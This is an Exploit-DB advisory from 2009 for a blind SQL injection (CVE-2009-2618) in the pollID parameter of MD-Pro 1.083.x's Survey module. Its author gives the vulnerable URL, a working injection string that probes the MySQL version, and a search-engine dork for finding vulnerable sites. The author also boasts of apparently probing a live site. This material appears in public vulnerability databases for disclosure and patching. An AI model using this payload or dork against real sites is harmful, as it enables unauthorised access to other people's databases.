MD-Pro 1.083.x Survey Module pollID Blind SQL Injection Vulnerability

ID EDB-ID:9021
Type exploitdb
Reporter XaDoS
Modified 2009-06-25T00:00:00


MD-Pro 1.083.x Survey Module (pollID) Blind SQL Injection Vulnerability. CVE-2009-2618. Webapps exploit for php platform


[Product:  MDPro v 1.083.x               ]
[site:                ]
[Vuln:     Blind $QL Injection (pollID)  ]
[Author:   XaDoS ~ thanks to S3rg3770    ]
[dork:     inurl:modules.php?op= "pollID"]
[          "Powered By MDPro"            ]

[~] Vuln:  (PollID)[MDPro_path]/modules.php?name=Surveys&op=results&pollID=[SQL]

[~] DeMo:

For example, if yuo want see the version of MySql write:[MDPro_path]/modules.php?name=Surveys&op=results&pollID=+and+substring(@@version,1,1)=5#

Like:,1,1)=5# [work]
so v => 5.0.0    (this site have 96 databases) :)

[~] Note:

If yuo want exploit for this vuln write it by yuorself. I'm really Busy.

thanks to s3rg3770 and warwolfz Crew

\*Everything that gives pleasure has its reason. To scorn the mobs of those who go astray is not the means to bring them around*/ C.Baudelaire

Have Fun :D

# [2009-06-25]